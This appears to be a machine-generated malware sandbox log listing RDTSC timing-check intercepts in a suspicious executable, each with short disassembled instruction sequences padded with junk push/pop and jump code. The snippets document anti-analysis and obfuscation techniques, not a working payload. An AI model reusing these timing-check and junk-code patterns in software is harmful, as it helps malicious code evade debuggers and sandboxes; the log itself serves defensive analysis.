Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BB07 second address: 27BB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0549119938h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 cld 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F0549119938h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2C54h], edx 0x00000049 push eax 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CC65B second address: 2CC67B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05491602DAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F0549160301h 0x00000018 jbe 00007F05491602E2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CD156 second address: 2CD15A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CD15A second address: 2CD18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05491602DAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F05491602E9h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CD18B second address: 2CD1A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F054911993Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CD1A0 second address: 2CD1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CFC6F second address: 2CFC79 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0549119936h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2D41B7 second address: 2D41D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2D4636 second address: 2D463C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD69A second address: 2DD6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD846 second address: 2DD84C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD84C second address: 2DD85B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD85B second address: 2DD85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD978 second address: 2DD97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD97E second address: 2DD988 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0549119936h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDC14 second address: 2DDC2D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 jmp 00007F05491602DFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDC2D second address: 2DDC4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0549119936h 0x00000009 jmp 00007F054911993Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDC4A second address: 2DDC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDF33 second address: 2DDF55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119947h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDF55 second address: 2DDF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE278 second address: 2DE28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jnp 00007F0549119936h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE28A second address: 2DE290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE290 second address: 2DE298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE298 second address: 2DE29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DE29E second address: 2DE2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119945h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3390 second address: 2E3398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3398 second address: 2E33A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0549119936h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E33A7 second address: 2E33AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E33AB second address: 2E33D4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F054911993Dh 0x00000012 jmp 00007F054911993Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E2834 second address: 2E283C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E283C second address: 2E2842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E2842 second address: 2E2846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E2846 second address: 2E2876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F054911993Ch 0x00000010 jl 00007F0549119936h 0x00000016 jnl 00007F054911994Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E2DB4 second address: 2E2DD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F05491602E2h 0x00000010 jl 00007F05491602D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3075 second address: 2E3083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3083 second address: 2E3087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E3087 second address: 2E308D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E308D second address: 2E3093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2E78EA second address: 2E78FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0549119936h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EEDF5 second address: 2EEDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EEDFA second address: 2EEE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EEE00 second address: 2EEE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EF87B second address: 2EF888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F0549119936h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EFB58 second address: 2EFB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EFB5E second address: 2EFB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2EE8E6 second address: 2EE8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602DAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2F65AF second address: 2F65B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2F65B9 second address: 2F65BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2F61C3 second address: 2F61C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3065CA second address: 3065D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3065D1 second address: 3065E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 306052 second address: 306056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 306056 second address: 306078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F054911993Dh 0x0000000b pop edx 0x0000000c jng 00007F0549119957h 0x00000012 je 00007F0549119951h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3061F0 second address: 3061F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3080E7 second address: 3080EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 30EBAF second address: 30EBC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 30EBC5 second address: 30EBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F054911993Eh 0x0000000b popad 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 30EBDE second address: 30EBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 317D29 second address: 317D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F0549119936h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 317D3A second address: 317D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 31CACD second address: 31CAD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 22C889 second address: 22C89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F05491602DBh 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3226FC second address: 322700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 322EDB second address: 322EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 322EE1 second address: 322EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 322EE5 second address: 322EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 322EE9 second address: 322EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 323A9A second address: 323AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 323AA4 second address: 323AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 323AAE second address: 323AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3293FC second address: 329407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0549119936h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 337A15 second address: 337A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 339DA6 second address: 339DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B697 second address: 33B6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F05491602D6h 0x0000000a jmp 00007F05491602E2h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B6B9 second address: 33B6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B6BD second address: 33B6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B6C3 second address: 33B6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B4E0 second address: 33B4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B4E4 second address: 33B4F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0549119936h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B4F4 second address: 33B4FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B4FC second address: 33B501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B501 second address: 33B510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F05491602D6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 33B510 second address: 33B514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 349A3B second address: 349A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F05491602D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 35D840 second address: 35D844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 35D844 second address: 35D852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F05491602E2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 35DB05 second address: 35DB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 35DB0B second address: 35DB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 35DB11 second address: 35DB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 35DB1B second address: 35DB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E1h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F05491602D6h 0x00000014 jmp 00007F05491602DDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 35F3AA second address: 35F3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 35F3AE second address: 35F3B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 362083 second address: 362087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 362298 second address: 3622B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3622B2 second address: 3622B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3622B8 second address: 3622BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 3622BC second address: 3622C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
